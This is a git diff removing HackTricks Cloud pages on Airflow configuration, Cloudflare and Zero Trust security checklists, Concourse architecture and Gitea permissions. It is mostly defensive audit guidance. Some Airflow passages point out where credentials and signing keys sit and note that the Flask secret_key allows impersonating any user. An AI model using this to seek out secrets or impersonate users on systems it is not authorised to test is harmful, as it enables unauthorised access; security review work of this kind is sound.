- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Configuration File - -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** - -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** - -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. - -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. - -Some interesting values to check when reading the config file: - -### \[api] - -* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - * `airflow.api.auth.backend.basic_auth`: For **basic authentication** - * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). 
- * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - * You can also **create you own authentication** method with python. -* **`google_key_path`:** Path to the **GCP service account key** - -### **\[atlas]** - -* **`password`**: Atlas password -* **`username`**: Atlas username - -### \[celery] - -* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -* **`result_backend`**: Postgres url which may contain **credentials**. -* **`ssl_cacert`**: Path to the cacert -* **`ssl_cert`**: Path to the cert -* **`ssl_key`**: Path to the key - -### \[core] - -* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -* **`fernet_key`**: Key to store encrypted variables (symmetric) -* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -* **`security`**: What security module to use (for example kerberos) - -### \[dask] - -* **`tls_ca`**: Path to ca -* **`tls_cert`**: Part to the cert -* **`tls_key`**: Part to the tls key - -### \[kerberos] - -* **`ccache`**: Path to ccache file -* **`forwardable`**: Enabled by default - -### \[logging] - -* **`google_key_path`**: Path to GCP JSON creds. - -### \[secrets] - -* **`backend`**: Full class name of secrets backend to enable -* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. 
- -### \[smtp] - -* **`smtp_password`**: SMTP password -* **`smtp_user`**: SMTP user - -### \[webserver] - -* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -* **`cookie_secure`**: Set **secure flag** on the the session cookie -* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible - -### Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - -```bash -AUTH_TYPE = AUTH_DB -``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - -```bash -AUTH_TYPE = AUTH_OAUTH -``` - -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - -```bash -AUTH_ROLE_PUBLIC = 'Admin' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/README.md b/pentesting-ci-cd/cloudflare-security/README.md deleted file mode 100644 index 05741968d..000000000 --- a/pentesting-ci-cd/cloudflare-security/README.md +++ /dev/null @@ -1,163 +0,0 @@ -# Cloudflare Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -## Websites - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -### Domain Registration - -* [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -## Analytics - -_I couldn't find anything to check for a config security review._ - -## Pages - -On each Cloudflare's page: - -* [ ] Check for **sensitive information** in the **`Build log`**. -* [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -* [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -* [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -* [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -* [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -* [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. - -## **Workers** - -On each Cloudflare's worker check: - -* [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? 
-* [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - * Check for SSRFs returning the indicated page that you can control - * Check XSSs executing JS inside a svg image - * It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. - -{% hint style="warning" %} -Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. -{% endhint %} - -## R2 - -On each R2 bucket check: - -* [ ] Configure **CORS Policy**. - -## Stream - -TODO - -## Images - -TODO - -## Security Center - -* [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. - * [ ] Just **check this information** for security misconfigurations and interesting info - -## Turnstile - -TODO - -## **Zero Trust** - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -## Bulk Redirects - -{% hint style="info" %} -Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. 
-{% endhint %} - -* [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -* [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. - -## Notifications - -* [ ] Check the **notifications.** These notifications are recommended for security: - * `Usage Based Billing` - * `HTTP DDoS Attack Alert` - * `Layer 3/4 DDoS Attack Alert` - * `Advanced HTTP DDoS Attack Alert` - * `Advanced Layer 3/4 DDoS Attack Alert` - * `Flow-based Monitoring: Volumetric Attack` - * `Route Leak Detection Alert` - * `Access mTLS Certificate Expiration Alert` - * `SSL for SaaS Custom Hostnames Alert` - * `Universal SSL Alert` - * `Script Monitor New Code Change Detection Alert` - * `Script Monitor New Domain Alert` - * `Script Monitor New Malicious Domain Alert` - * `Script Monitor New Malicious Script Alert` - * `Script Monitor New Malicious URL Alert` - * `Script Monitor New Scripts Alert` - * `Script Monitor New Script Exceeds Max URL Length Alert` - * `Advanced Security Events Alert` - * `Security Events Alert` -* [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - * [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** - -## Manage Account - -* [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -* [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -* [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. 
But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - * Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -* [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. - -{% hint style="info" %} -Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) -{% endhint %} - -## DDoS Investigation - -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md deleted file mode 100644 index 7eb00f0ba..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ /dev/null @@ -1,159 +0,0 @@ -# Cloudflare Domains - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Overview - -* [ ] Get a feeling of **how much** are the services of the account **used** -* [ ] Find also the **zone ID** and the **account ID** - -### Analytics - -* [ ] In **`Security`** check if there is any **Rate limiting** - -### DNS - -* [ ] Check **interesting** (sensitive?) data in DNS **records** -* [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -* [ ] Check for web pages that **aren't** **proxied** -* [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -* [ ] Check that **DNSSEC** is **enabled** -* [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - * This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -* [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) - -### **Email** - -TODO - -### Spectrum - -TODO - -### SSL/TLS - -#### **Overview** - -* [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -* [ ] The **SSL/TLS Recommender** should be enabled - -#### Edge Certificates - -* [ ] **Always Use HTTPS** should be **enabled** -* [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -* [ ] **Minimum TLS Version should be 1.2** -* [ ] **TLS 1.3 should be enabled** -* [ ] **Automatic HTTPS Rewrites** should be **enabled** -* [ ] **Certificate Transparency Monitoring** should be **enabled** - -### **Security** - -* [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - * The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. 
-* [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -* [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -* [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -* [ ] In the **`Settings`** section: - * [ ] Check that the **`Security Level`** is **medium** or greater - * [ ] Check that the **`Challenge Passage`** is 1 hour at max - * [ ] Check that the **`Browser Integrity Check`** is **enabled** - * [ ] Check that the **`Privacy Pass Support`** is **enabled** - -#### **CloudFlare DDoS Protection** - -* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - * If the attack is from a **verified bot**, at least **add a rate limit** to bots. - * If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - * You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - * Check if **Managed rules** could also help to prevent vulnerability exploitations. - * In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -* In DDoS you could **override some rules to make them more restrictive**. -* **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. 
-* In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -* In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** - -### Access - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -### Speed - -_I couldn't find any option related to security_ - -### Caching - -* [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** - -### **Workers Routes** - -_You should have already checked_ [_cloudflare workers_](./#workers) - -### Rules - -TODO - -### Network - -* [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -* [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -* [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** - -### **Traffic** - -TODO - -### Custom Pages - -* [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) - -### Apps - -TODO - -### Scrape Shield - -* [ ] Check **Email Address Obfuscation** is **enabled** -* [ ] Check **Server-side Excludes** is **enabled** - -### **Zaraz** - -TODO - -### **Web3** - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
deleted file mode 100644
index 85b037522..000000000
--- a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
+++ /dev/null
@@ -1,87 +0,0 @@
-# Cloudflare Zero Trust Network
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
-
-
- -### Analytics - -* [ ] Useful to **get to know the environment** - -### **Gateway** - -* [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - * If used, **policies** could be created to **restrict** the access to malicious sites. - * This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. - -### Access - -#### Applications - -On each application: - -* [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - * To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -* [ ] Check the **available identity providers** and make sure they **aren't too open** -* [ ] In **`Settings`**: - * [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - * [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - * [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** - -#### **Access Groups** - -* [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -* [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - * Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. 
- -#### Service Auth - -* [ ] Check that all service tokens **expires in 1 year or less** - -#### Tunnels - -TODO - -### My Team - -TODO - -### Logs - -* [ ] You could search for **unexpected actions** from users - -### Settings - -* [ ] Check the **plan type** -* [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -* [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/README.md b/pentesting-ci-cd/concourse-security/README.md
deleted file mode 100644
index bc438e1de..000000000
--- a/pentesting-ci-cd/concourse-security/README.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# Concourse Security
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-## Basic Information
-
-Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
-
-## Concourse Architecture
-
-Learn how the concourse environment is structured in:
-
-{% content-ref url="concourse-architecture.md" %}
-[concourse-architecture.md](concourse-architecture.md)
-{% endcontent-ref %}
-
-## Concourse Lab
-
-Learn how you can run a concourse environment locally to do your own tests in:
-
-{% content-ref url="concourse-lab-creation.md" %}
-[concourse-lab-creation.md](concourse-lab-creation.md)
-{% endcontent-ref %}
-
-## Enumerate & Attack Concourse
-
-Learn how you can enumerate the concourse environment and abuse it in:
-
-{% content-ref url="concourse-enumeration-and-attacks.md" %}
-[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md
deleted file mode 100644
index c2a08a80f..000000000
--- a/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# Concourse Architecture
-
-## Concourse Architecture
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) - -### Architecture - -![](<../../.gitbook/assets/image (187).png>) - -#### ATC: web UI & build scheduler - -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). - -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. - -#### TSA: worker registration & forwarding - -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). - -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. - -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). - -#### Workers - -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). - -* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. 
-* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. - -## References - -* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md
deleted file mode 100644
index b5daaad8e..000000000
--- a/pentesting-ci-cd/gitea-security/basic-gitea-information.md
+++ /dev/null
@@ -1,131 +0,0 @@
-# Basic Gitea Information
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Structure - -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. - -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. - -A user may also be **part of different teams** with different permissions over different repos. - -And finally **repositories may have special protection mechanisms**. - -## Permissions - -### Organizations - -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. - -**Org admins** (owners) can select the **visibility** of the organization: - -* Public -* Limited (logged in users only) -* Private (members only) - -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. - -When creating a new team, several important settings are selected: - -* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -* It's also indicated **if members can create new repos** (creator will get admin access to it) -* The **permissions** the **members** of the repo will **have**: - * **Administrator** access - * **Specific** access: - -![](<../../.gitbook/assets/image (118).png>) - -### Teams & Users - -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. 
